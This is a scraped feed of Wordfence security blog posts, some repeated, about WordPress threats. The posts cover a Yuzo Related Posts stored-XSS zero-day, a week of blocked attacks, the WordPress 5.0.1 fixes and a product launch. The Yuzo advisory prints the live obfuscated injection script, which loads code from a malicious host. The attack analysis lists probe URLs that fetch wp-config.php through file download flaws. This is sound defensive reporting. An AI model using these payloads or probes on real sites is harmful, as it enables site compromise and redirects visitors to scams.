Yuzo Related Posts Zero-Day Vulnerability Exploited in the Wild

The Yuzo Related Posts plugin, which is installed on over 60,000 websites, was removed from the WordPress.org plugin directory on March 30, 2019 after an unpatched vulnerability was publicly, and irresponsibly, disclosed by a security researcher that same day. The vulnerability, which allows stored cross-site scripting (XSS), is now being exploited in the wild. These attacks appear to be linked to the same threat actor who targeted the recent Social Warfare and Easy WP SMTP vulnerabilities.

The XSS protection included in the Wordfence firewall protects against the exploit attempts we have seen so far. Both free and Premium Wordfence users are protected against these attacks. Based on a deeper analysis of the security flaws present in the plugin we have also deployed protection against additional attack vectors. Premium customers will receive the update today, free users in 30 days. We recommend that all users remove the plugin from their sites immediately.

is_admin() Strikes Again

The vulnerability in Yuzo Related Posts stems from missing authentication checks in the plugin routines responsible for storing settings in the database. The code below from assets/ilenframework/core.php is the crux of the problem.

function __construct(){

if( ! is_admin() ){ // only front-end

self::set_main_variable();
return;

}elseif( is_admin() ){ // only admin

// set default if not exists
self::_ini_();

Developers often mistakenly use is_admin() to check if a piece of code that requires administrative privileges should be run, but as the WordPress documentation points out, that isn’t how the function should be used. In this scenario self::_ini_() is called on any request to an administrative interface page, including /wp-admin/options-general.php and /wp-admin/admin-post.php, which allows a POST request to those pages to be processed by self::save_options(); later in the code.

The result is that an unauthenticated attacker can inject malicious content, such as a JavaScript payload, into the plugin settings. That payload is then inserted into HTML templates and executed by the web browser when users visit the compromised website. This security issue could be used to deface websites, redirect visitors to unsafe websites, or compromise WordPress administrator accounts, among other things.

Exploits Lead to Malicious Redirects

Today, eleven days after this vulnerability was irresponsibly disclosed and a proof-of-concept (PoC) was published, threat actors have begun exploiting sites with Yuzo Related Posts installed.

Exploits currently seen in the wild inject malicious JavaScript into the yuzo_related_post_css_and_style option value.

</style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 100, 100, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 100, 100, 41, 59, 32, 118, 97, 114, 32, 104, 104, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 57, 55, 44, 32, 49, 48, 48, 41, 59, 118, 97, 114, 32, 122, 122, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 48, 54, 44, 32, 57, 55, 44, 32, 49, 49, 56, 44, 32, 57, 55, 44, 32, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 101, 108, 101, 109, 46, 116, 121, 112, 101, 32, 61, 32, 122, 122, 59, 32, 101, 108, 101, 109, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 101, 108, 101, 109, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 49, 48, 56, 44, 32, 49, 48, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 50, 44, 32, 49, 49, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 49, 48, 44, 32, 49, 50, 49, 44, 32, 52, 54, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 51, 44, 32, 52, 55, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 49, 55, 44, 32, 49, 49, 48, 44, 32, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 49, 52, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 104, 104, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 101, 108, 101, 109, 41, 59));</script>

Once deobfuscated, it’s easier to see what the script is doing:

</style><script language=javascript>var elem = document.createElement('script');
elem.type = 'text/javascript';
elem.async = true;
elem.src = 'https://hellofromhony.org/counter';
document.getElementsByTagName('head')[0].appendChild(elem);</script>

When a user visits a compromised website containing the above payload, they will be redirected to malicious tech support scam pages. Example:

Three Vulnerabilities with a Lot in Common

Our analysis shows that the attempts to exploit this vulnerability share a number of commonalities with attacks on two other vulnerabilities discovered in other plugins: Social Warfare and Easy WP SMTP.

Exploits so far have used a malicious script hosted on hellofromhony[.]org, which resolves to 176.123.9[.]53. That same IP address was used in the Social Warfare and Easy WP SMTP campaigns. In addition, all three campaigns involved exploitation of stored XSS injection vulnerabilities and have deployed malicious redirects. We are confident that the tactics, techniques and procedures (TTPs) in all three attacks point to a common threat actor.

Conclusion

As was the case a few weeks ago, the irresponsible actions of a security researcher has resulted in a zero-day plugin vulnerability being exploited in the wild. Cases like this underscore the importance of a layered security approach which includes a WordPress firewall.

Site owners running the Yuzo Related Posts plugin are urged to remove it from their sites immediately, at least until a fix has been published by the author. Wordfence Premium customers and free users have been protected against the current attacks we’re seeing in the wild. An additional firewall rule to protect against alternate exploits has been developed and deployed to our Premium customers today and will be available to free users in 30 days.

The post Yuzo Related Posts Zero-Day Vulnerability Exploited in the Wild appeared first on Wordfence.

Read More

Yuzo Related Posts Zero-Day Vulnerability Exploited in the Wild

The Yuzo Related Posts plugin, which is installed on over 60,000 websites, was removed from the WordPress.org plugin directory on March 30, 2019 after an unpatched vulnerability was publicly, and irresponsibly, disclosed by a security researcher that same day. The vulnerability, which allows stored cross-site scripting (XSS), is now being exploited in the wild. These attacks appear to be linked to the same threat actor who targeted the recent Social Warfare and Easy WP SMTP vulnerabilities.

The XSS protection included in the Wordfence firewall protects against the exploit attempts we have seen so far. Both free and Premium Wordfence users are protected against these attacks. Based on a deeper analysis of the security flaws present in the plugin we have also deployed protection against additional attack vectors. Premium customers will receive the update today, free users in 30 days. We recommend that all users remove the plugin from their sites immediately.

is_admin() Strikes Again

The vulnerability in Yuzo Related Posts stems from missing authentication checks in the plugin routines responsible for storing settings in the database. The code below from assets/ilenframework/core.php is the crux of the problem.

function __construct(){

if( ! is_admin() ){ // only front-end

self::set_main_variable();
return;

}elseif( is_admin() ){ // only admin

// set default if not exists
self::_ini_();

Developers often mistakenly use is_admin() to check if a piece of code that requires administrative privileges should be run, but as the WordPress documentation points out, that isn’t how the function should be used. In this scenario self::_ini_() is called on any request to an administrative interface page, including /wp-admin/options-general.php and /wp-admin/admin-post.php, which allows a POST request to those pages to be processed by self::save_options(); later in the code.

The result is that an unauthenticated attacker can inject malicious content, such as a JavaScript payload, into the plugin settings. That payload is then inserted into HTML templates and executed by the web browser when users visit the compromised website. This security issue could be used to deface websites, redirect visitors to unsafe websites, or compromise WordPress administrator accounts, among other things.

Exploits Lead to Malicious Redirects

Today, eleven days after this vulnerability was irresponsibly disclosed and a proof-of-concept (PoC) was published, threat actors have begun exploiting sites with Yuzo Related Posts installed.

Exploits currently seen in the wild inject malicious JavaScript into the yuzo_related_post_css_and_style option value.

</style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 100, 100, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 100, 100, 41, 59, 32, 118, 97, 114, 32, 104, 104, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 57, 55, 44, 32, 49, 48, 48, 41, 59, 118, 97, 114, 32, 122, 122, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 48, 54, 44, 32, 57, 55, 44, 32, 49, 49, 56, 44, 32, 57, 55, 44, 32, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 101, 108, 101, 109, 46, 116, 121, 112, 101, 32, 61, 32, 122, 122, 59, 32, 101, 108, 101, 109, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 101, 108, 101, 109, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 49, 48, 56, 44, 32, 49, 48, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 50, 44, 32, 49, 49, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 49, 48, 44, 32, 49, 50, 49, 44, 32, 52, 54, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 51, 44, 32, 52, 55, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 49, 55, 44, 32, 49, 49, 48, 44, 32, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 49, 52, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 104, 104, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 101, 108, 101, 109, 41, 59));</script>

Once deobfuscated, it’s easier to see what the script is doing:

</style><script language=javascript>var elem = document.createElement('script');
elem.type = 'text/javascript';
elem.async = true;
elem.src = 'https://hellofromhony.org/counter';
document.getElementsByTagName('head')[0].appendChild(elem);</script>

When a user visits a compromised website containing the above payload, they will be redirected to malicious tech support scam pages. Example:

Three Vulnerabilities with a Lot in Common

Our analysis shows that the attempts to exploit this vulnerability share a number of commonalities with attacks on two other vulnerabilities discovered in other plugins: Social Warfare and Easy WP SMTP.

Exploits so far have used a malicious script hosted on hellofromhony[.]org, which resolves to 176.123.9[.]53. That same IP address was used in the Social Warfare and Easy WP SMTP campaigns. In addition, all three campaigns involved exploitation of stored XSS injection vulnerabilities and have deployed malicious redirects. We are confident that the tactics, techniques and procedures (TTPs) in all three attacks point to a common threat actor.

Conclusion

As was the case a few weeks ago, the irresponsible actions of a security researcher has resulted in a zero-day plugin vulnerability being exploited in the wild. Cases like this underscore the importance of a layered security approach which includes a WordPress firewall.

Site owners running the Yuzo Related Posts plugin are urged to remove it from their sites immediately, at least until a fix has been published by the author. Wordfence Premium customers and free users have been protected against the current attacks we’re seeing in the wild. An additional firewall rule to protect against alternate exploits has been developed and deployed to our Premium customers today and will be available to free users in 30 days.

The post Yuzo Related Posts Zero-Day Vulnerability Exploited in the Wild appeared first on Wordfence.

Read More

Introducing Wordfence Central

Over the last several months, we have been focused on making Wordfence a better option for organizations with a large number of WordPress sites to protect. To start, we added the ability to secure your staging and development environments with a single Wordfence premium license, something you should take advantage of if you haven’t already.

Next we changed the way we handle volume discounts to make managing a large number of sites easier.

Shortly after that we launched Wordfence Agency Solutions, empowering our client partners to develop custom security solutions for agencies and our enterprise customers.

Today we are thrilled to announce the launch of Wordfence Central. Wordfence Central provides an efficient way to manage the security of many WordPress sites in one place. It includes a powerful dashboard, a single interface to view and manage security findings across all of your sites and powerful new tools that make managing Wordfence configuration for your websites a breeze.

It’s Completely Free to Use

One of the first questions we get from people when we show them Central is, “What’s the catch? This can’t really be free, can it?”

There’s no catch, it’s really free.

You’re welcome to use Wordfence Central to manage all of your websites at no charge. There are no limits or restrictions of any kind.

The Wordfence Central Dashboard

The Wordfence Central Dashboard shows you the security status of your websites at a glance.

A high level summary of the latest scan tells you how many issues were discovered, along with a brief summary of the highest severity findings. You can view detailed findings with a single click, never leaving Wordfence Central.

High level metrics show you the current configuration status for the Wordfence firewall and scanner. The Premium license status lets you know which sites need to be upgraded. You can upgrade sites and update their configurations in just a few clicks, without ever leaving Wordfence Central.

Powerful sort, filter and search capabilities make managing even hundreds of sites a breeze.

Security Findings

Before Wordfence Central, keeping up with Wordfence scan results meant either visiting your sites regularly or reading through a constant flow of email alerts. Now you can view the current status of all your sites in one place, and drill down to view detailed findings without leaving Central.

In many cases you can take action on a finding without leaving Central. When you do need to visit your site to deal with a security finding, Central makes it easy by taking you to the relevant page with a single click.

If your site hasn’t been scanned recently, no problem! Launch a scan in Central and watch the results stream back in real-time.

Configuration

The default Wordfence configuration works for most site owners, but advanced users tend to make changes. As someone responsible for multiple sites, this can be a daunting task. With Wordfence Central you can now make those changes quickly and efficiently.

When you first land on the Configuration page in Wordfence Central you are greeted with a high level summary, showing you the current firewall, scan and premium license status for each site, whether a template has been applied to it and whether its configuration still matches the template. More on the magic of templates later!

To view or make changes to a site’s configuration you can simply click the “Manage Site” link, which will bring you to the equivalent of the “All Options” page in the Wordfence plugin. Once the changes you need to make are complete, hitting “Save Changes” will send your changes down to your site in seconds. It’s that easy.

Templates!

The real configuration workhorse in Wordfence Central is templates. Templates give you the ability to create and manage as many Wordfence configurations as you like. For example, you might want one template for your VIP clients and another for everyone else.

Templates make configuring new sites incredibly easy. Simply add the new site to Central, navigate to Configuration and apply a template to the new site. This will take care of 99% of the settings in Wordfence. Enabling “extended protection” for the firewall, which is strongly recommended, still requires a visit to the admin area of your site.

Getting Started

To get started with Wordfence Central, go to wordfence.com/central. You’ll be greeted with a high-level overview of Central including screenshots. To dive right in click the “Get Started” button. You will need to sign in or create an account if you don’t already have one.

Once you’re logged in you will be asked to set up two-factor authentication, or 2FA, for your account. It’s optional, but we strongly recommend that you set it up. Wordfence Central will have the ability to make changes to how Wordfence is configured for all of the sites you connect, so we want to take extra care to keep your account safe.

Once you’ve set up 2FA, you will be prompted to connect your first website. After you submit the site URL, Wordfence Central runs a quick series of connectivity checks. If everything checks out your site is added and you will be prompted to add another. It’s that easy.

Live-Stream Demo + Q&A

Tomorrow morning (Thursday) at 8am Pacific / 11am Eastern Mark Maunder, our CEO, will be live-streaming a Wordfence Central demo followed by Q&A. You can attend by visiting https://wordfence.com/blog/2019/02/wordfence-central-livestream/. Submit your questions via the comments for that post now and during the event.

Conclusion

We couldn’t be more excited about launching Wordfence Central this week. We hope it will make life easier for you, whether you manage three sites or three thousand. New features are already in the works, so expect to see additional functionality released throughout the year.

As always we’d love to hear from you in the comments and we hope you can join us for tomorrow’s live-stream demo and Q&A!

The post Introducing Wordfence Central appeared first on Wordfence.

Read More

Analyzing a Week of Blocked Attacks

If you’ve never taken a few minutes to look at the information available in the Wordfence Live Traffic feature, I strongly recommend it. It gives you a detailed look at what attackers are trying to do to break into your site, and how Wordfence is blocking them.

For today’s post we analyzed all of the blocked attacks on Defiant.com for a week. In order to see them in Live Traffic, I simply selected “Blocked by Firewall” from the “filter traffic” drop-down above the data table.

What Attackers Were Up To

For the week there were a total of 223 attacks blocked. I was excited to see that all of them were blocked by the Wordfence real-time IP blacklist. We are used to seeing really high percentages blocked by our blacklist – usually in the high 90s. The real-time IP blacklist is a Premium feature that blocks all requests from IPs that are actively attacking WordPress sites.

Attacks originated from 14 unique IP addresses from around the world. Of the countries represented, Germany was the origin for the most attacks at 85. India was second with 61 and France was third with 45. Other countries represented were Ukraine, South Africa, China, Italy and the United Kingdom.

Next we’ll break down what they were trying to do to break in.

Reconnaissance

Five of the IPs appeared to just be performing reconnaissance, as they were simply requesting our home page or some other page on the site. They were likely just checking to see if the site was up and responding to their requests. Since all of the IPs were on the Wordfence real-time IP blacklist, their requests were blocked and they moved on after a couple of blocked page requests.

Author Enumeration

A Chinese IP attempted to retrieve a list of author usernames for the site. Since the authors of posts are very often also administrators, this information can significantly improve the odds of success for a brute force password guessing attack. The attacks all look like the following:

https://www.defiant.com/?author=1

The attacker worked through fifteen author numbers before giving up and moving on. In the Wordfence “Brute Force Protection” settings, look for the following option to enable this feature:

“Prevent discovery of usernames through ‘/?author=N’ scans, the oEmbed API, and the WordPress REST API”

Once you enable this, Wordfence will block these scans. This option is enabled by default and is available for both free and premium users.

We have blocked 382,131 attacks from that IP in the last 7 days across all of our customers. It seems quite likely that had the attempt to retrieve usernames been successful, attempts to log in using lists of common passwords would have followed.

Login Attempts Via XML-RPC

Sixty Three of the blocked attacks were attempts to log in to the site via the XML-RPC interface, which is an API developers can use to communicate with WordPress sites. We see a high percentage of brute force password guessing attempts hit this interface.

In our case we saw a single IP from Chennai, India attempt 61 login attempts in the period of just over an hour. Two other IPs, one in Hong Kong and another in Italy, made just one attempt each. They most likely moved on because they were blocked.

Login Attempts Via wp-login.php

We had just one IP attempt to login via the interface you use to login your site. The first attempt to login was followed immediately by an attempt to access our home page. The script was most likely checking to see if they were only being blocked from accessing the login page or the entire site. A second attempt following the same pattern occurred just two minutes later. We didn’t see additional attempts from that IP. I assume the attacker’s bot is programmed to move on if it’s blocked twice in a row.

A French IP Probes for Opportunities

A single French IP sent 43 requests in a 33 second burst. The first was a simple home page request, which I assume was an attempt to verify the site was up and accepting requests. Surprisingly the attack continued despite being consistently blocked by the Wordfence firewall. The following are a few examples of what the attacker was up to.

One request was checking for the existence of a known malicious file, commonly used by attackers to upload files to hacked websites. The request looks like this:

https://www.defiant.com/wp-upload-class.php

Another interesting request was looking for opportunities to exploit fresh WordPress installs, which we wrote about in July of 2017. Here’s what the request looks like:

https://www.defiant.com/wp-admin/setup-config.php?step=1

We also saw two attempts to find a copy of searchreplacedb2.php laying around. In July of 2017 we wrote about how hackers use the searchreplacedb2.php script to make malicious database changes. Here’s an example request:

https://www.defiant.com/searchreplacedb2.php

A German IP Probes for Opportunities

A single IP from Hirschfield, Germany attacked our site 85 times in just under two minutes. Most of the attacks were repeats of what we saw from the French IP. So it’s possible that it was a different bot at work for the same attacker. However, this IP also attempted to exploit a number of known theme and plugin vulnerabilities.

All of these attempts to exploit known vulnerabilities were trying to download the wp-config.php file, which is a WordPress file that includes the database credentials for the site. If successful, these attacks would give the attacker an easy route to obtaining administrative control of target website.

In one example, the attacker is attempting to exploit an arbitrary file download vulnerability in the “Epic” theme that was disclosed way back in 2014.

https://www.defiant.com/wp-content/themes/epic/includes/download.php?file=wp-config.php

In another, the attacker is trying to exploit a different arbitrary file download vulnerability – this time in the WP Hide & Security Enhancer plugin. The vulnerability was disclosed less than six months ago.

https://www.defiant.com/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=%2Fwp-config.php

It’s important to note that we are not running any of the themes or plugins this attacker is attempting to exploit on Defiant.com. Many of the attacks on WordPress sites are what we often refer to as “spray and pray” attacks, where the attacker simply tries hundreds or thousands of exploit attempts hoping to get lucky. It’s likely that attack volumes are lower for Defiant.com because it’s protected by the Wordfence real-time IP blacklist. Like you, attackers don’t want to waste resources. If all of their attacks are being blocked they will move on to an easier target.

Conclusion

As you know, WordPress sites are under constant attack. There are many attackers, all of whom deploy different tactics. The free version of Wordfence includes protection for all of the attacks outlined above. For even better peace of mind, and likely lower attack volumes, consider upgrading to Wordfence Premium. For only $8.25 per month (billed annually) you can put the Wordfence real-time IP blacklist to work protecting your site around the clock.

The post Analyzing a Week of Blocked Attacks appeared first on Wordfence.

Read More

Analyzing a Week of Blocked Attacks

If you’ve never taken a few minutes to look at the information available in the Wordfence Live Traffic feature, I strongly recommend it. It gives you a detailed look at what attackers are trying to do to break into your site, and how Wordfence is blocking them.

For today’s post we analyzed all of the blocked attacks on Defiant.com for a week. In order to see them in Live Traffic, I simply selected “Blocked by Firewall” from the “filter traffic” drop-down above the data table.

What Attackers Were Up To

For the week there were a total of 223 attacks blocked. I was excited to see that all of them were blocked by the Wordfence real-time IP blacklist. We are used to seeing really high percentages blocked by our blacklist – usually in the high 90s. The real-time IP blacklist is a Premium feature that blocks all requests from IPs that are actively attacking WordPress sites.

Attacks originated from 14 unique IP addresses from around the world. Of the countries represented, Germany was the origin for the most attacks at 85. India was second with 61 and France was third with 45. Other countries represented were Ukraine, South Africa, China, Italy and the United Kingdom.

Next we’ll break down what they were trying to do to break in.

Reconnaissance

Five of the IPs appeared to just be performing reconnaissance, as they were simply requesting our home page or some other page on the site. They were likely just checking to see if the site was up and responding to their requests. Since all of the IPs were on the Wordfence real-time IP blacklist, their requests were blocked and they moved on after a couple of blocked page requests.

Author Enumeration

A Chinese IP attempted to retrieve a list of author usernames for the site. Since the authors of posts are very often also administrators, this information can significantly improve the odds of success for a brute force password guessing attack. The attacks all look like the following:

https://www.defiant.com/?author=1

The attacker worked through fifteen author numbers before giving up and moving on. In the Wordfence “Brute Force Protection” settings, look for the following option to enable this feature:

“Prevent discovery of usernames through ‘/?author=N’ scans, the oEmbed API, and the WordPress REST API”

Once you enable this, Wordfence will block these scans. This option is enabled by default and is available for both free and premium users.

We have blocked 382,131 attacks from that IP in the last 7 days across all of our customers. It seems quite likely that had the attempt to retrieve usernames been successful, attempts to log in using lists of common passwords would have followed.

Login Attempts Via XML-RPC

Sixty Three of the blocked attacks were attempts to log in to the site via the XML-RPC interface, which is an API developers can use to communicate with WordPress sites. We see a high percentage of brute force password guessing attempts hit this interface.

In our case we saw a single IP from Chennai, India attempt 61 login attempts in the period of just over an hour. Two other IPs, one in Hong Kong and another in Italy, made just one attempt each. They most likely moved on because they were blocked.

Login Attempts Via wp-login.php

We had just one IP attempt to login via the interface you use to login your site. The first attempt to login was followed immediately by an attempt to access our home page. The script was most likely checking to see if they were only being blocked from accessing the login page or the entire site. A second attempt following the same pattern occurred just two minutes later. We didn’t see additional attempts from that IP. I assume the attacker’s bot is programmed to move on if it’s blocked twice in a row.

A French IP Probes for Opportunities

A single French IP sent 43 requests in a 33 second burst. The first was a simple home page request, which I assume was an attempt to verify the site was up and accepting requests. Surprisingly the attack continued despite being consistently blocked by the Wordfence firewall. The following are a few examples of what the attacker was up to.

One request was checking for the existence of a known malicious file, commonly used by attackers to upload files to hacked websites. The request looks like this:

https://www.defiant.com/wp-upload-class.php

Another interesting request was looking for opportunities to exploit fresh WordPress installs, which we wrote about in July of 2017. Here’s what the request looks like:

https://www.defiant.com/wp-admin/setup-config.php?step=1

We also saw two attempts to find a copy of searchreplacedb2.php laying around. In July of 2017 we wrote about how hackers use the searchreplacedb2.php script to make malicious database changes. Here’s an example request:

https://www.defiant.com/searchreplacedb2.php

A German IP Probes for Opportunities

A single IP from Hirschfield, Germany attacked our site 85 times in just under two minutes. Most of the attacks were repeats of what we saw from the French IP. So it’s possible that it was a different bot at work for the same attacker. However, this IP also attempted to exploit a number of known theme and plugin vulnerabilities.

All of these attempts to exploit known vulnerabilities were trying to download the wp-config.php file, which is a WordPress file that includes the database credentials for the site. If successful, these attacks would give the attacker an easy route to obtaining administrative control of target website.

In one example, the attacker is attempting to exploit an arbitrary file download vulnerability in the “Epic” theme that was disclosed way back in 2014.

https://www.defiant.com/wp-content/themes/epic/includes/download.php?file=wp-config.php

In another, the attacker is trying to exploit a different arbitrary file download vulnerability – this time in the WP Hide & Security Enhancer plugin. The vulnerability was disclosed less than six months ago.

https://www.defiant.com/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=%2Fwp-config.php

It’s important to note that we are not running any of the themes or plugins this attacker is attempting to exploit on Defiant.com. Many of the attacks on WordPress sites are what we often refer to as “spray and pray” attacks, where the attacker simply tries hundreds or thousands of exploit attempts hoping to get lucky. It’s likely that attack volumes are lower for Defiant.com because it’s protected by the Wordfence real-time IP blacklist. Like you, attackers don’t want to waste resources. If all of their attacks are being blocked they will move on to an easier target.

Conclusion

As you know, WordPress sites are under constant attack. There are many attackers, all of whom deploy different tactics. The free version of Wordfence includes protection for all of the attacks outlined above. For even better peace of mind, and likely lower attack volumes, consider upgrading to Wordfence Premium. For only $8.25 per month (billed annually) you can put the Wordfence real-time IP blacklist to work protecting your site around the clock.

The post Analyzing a Week of Blocked Attacks appeared first on Wordfence.

Read More

WordPress 5.0.1 Security Release – Immediate Update Recommended

WordPress 5.0.1 was released Wednesday night, less than a week after the much anticipated release of WordPress 5.0. This security release fixes seven security vulnerabilities, a few of which are quite serious.

Sites running versions in the 4.x branch of WordPress core are also impacted by some of the issues. WordPress 4.9.9 was released along with 5.0.1 to address the issues for those users.

We have not seen attempts to exploit these vulnerabilities in the wild yet, but given the number of sites impacted we expect that to change.

The speed at which these security issues were discovered, reported and fixed is a testament to the strength of the WordPress community working together.

Vulnerability Details

Sensitive Data Exposure

Team Yoast discovered that the user activation screen could be indexed by search engines in some uncommon configurations, leading to exposure of email addresses, and in some rare cases, default generated passwords. WordPress has addressed this by stripping the activation key used in the URL, and storing the value in a cookie instead.

PHP Object Injection

Sam Thomas discovered that contributors could craft meta data in a way that resulted in PHP object injection. This looks to be similar to the 2 arbitrary file delete vulnerabilities fixed in WordPress 4.9.6. This vulnerability allows an author to assign an arbitrary file path to an attachment. The file path supplied by the author uses the phar:// stream wrapper on a previously uploaded attachment which leads to object injection utilizing a “feature” of the PHAR file type which stores serialized objects in the metadata of the PHAR file. Sam Thomas presented this technique at BlackHat earlier this year.

Unauthorized Post Creation

Simon Scannell of RIPS Technologies discovered that authors could create posts of unauthorized post types with specially crafted input. The requirement that an attacker would need at least ‘author’ level privileges makes the likelihood of this being exploited on a widespread basis very low.

Privilege Escalation / XSS

Tim Coen discovered that contributors could edit new comments from higher-privileged users, potentially leading to a cross-site scripting vulnerability. This is another vulnerability that requires a higher-level user role, making the likelihood of widespread exploitation quite low. WordPress addressed this issue by removing the <form> tag from their HTML whitelist.

Privileged XSS

Tim Coen and Slavco discovered that users with ‘author’ privileges on Apache-hosted sites could upload specifically crafted files that bypass MIME verification, leading to a cross-site scripting vulnerability. Yet again, the ‘author’ level user requirement makes an unlikely target for attackers.

XSS That Could Impact Some Plugins

Tim Coen also discovered that specially crafted URL inputs could lead to a cross-site scripting vulnerability in some circumstances. The code change in WordPress core affects the wpmu_admin_do_redirect function which is not used in WordPress, but a plugin may call this function somewhere.

Unauthorized File Deletion

Karim El Oeurghemmi discovered that author-level users could alter metadata to delete files that they weren’t authorized to. This issue stems from the 2 arbitrary file delete vulnerabilities fixed in WordPress 4.9.6. The fix in WordPress addressed how attachment files are deleted, by restricting the file paths to the uploads directory, but did not address the issue of authors having the ability to change the attachment paths to arbitrary files. An author can use this to delete other users’ attachments.

What To Do

We have released firewall rules to protect our Premium customers against the vulnerabilities most likely to be exploited. Sites running the free version of Wordfence will receive them in 30 days.

Sites on WordPress 5.0 should update to version 5.0.1 as soon as possible. Those with automatic updates enabled for WordPress core should have already been updated, but given the nature of the vulnerabilities we recommend you check your sites manually just in case.

Sites running WordPress 4.x versions should update to version 4.9.9 as soon as possible. We’ve heard conflicting reports about automatic updates working for this upgrade. If you need to manually upgrade, the 4.9.9 update can be downloaded here.

You can find the official release announcement from the WordPress team here.

The post WordPress 5.0.1 Security Release – Immediate Update Recommended appeared first on Wordfence.

Read More

Video: WordCamp Atlanta Security Panel with Wordfence

In April, Wordfence sponsored WordCamp Atlanta and several of our team members attended the event. While there, we held a capture the flag (CTF) contest, which helps WordPress site owners learn to think like a hacker so that they can better defend their websites.

This post is Copyright 2018 Defiant, Inc. and was published on the wordfence.com official blog. Republication of this post without permission is prohibited. You can find this post at: https://www.wordfence.com/blog/2018/10/video-wordcamp-atlanta-security-panel-with-wordfence/

Part of hacker culture is the art of lock picking, which many of our team members do as a hobby. At WordCamp Atlanta, we taught many of the attendees to pick their first lock. Doing this is a great way to illustrate how it helps to think like your adversary when you are defending something. If you know how to pick a lock, you can better secure your home or office. Similarly, if you think like a hacker, you can better defend your WordPress websites. Our team does these demonstrations at every WordCamp we sponsor, and if you successfully pick a lock, we will award you a lock-pick set as a prize.

At WordCamp Atlanta, one of the scheduled speakers was unable to attend and our team volunteered to fill in. Four Wordfence team members participated in a panel, taking questions and discussing various WordPress security topics with the audience. Our panel consisted of:

Mark Maunder – CEO
Matt Barry – Lead Software Developer
Sean Murphy – Director of Threat Intelligence
Tim Cantrell – Customer Support Engineer

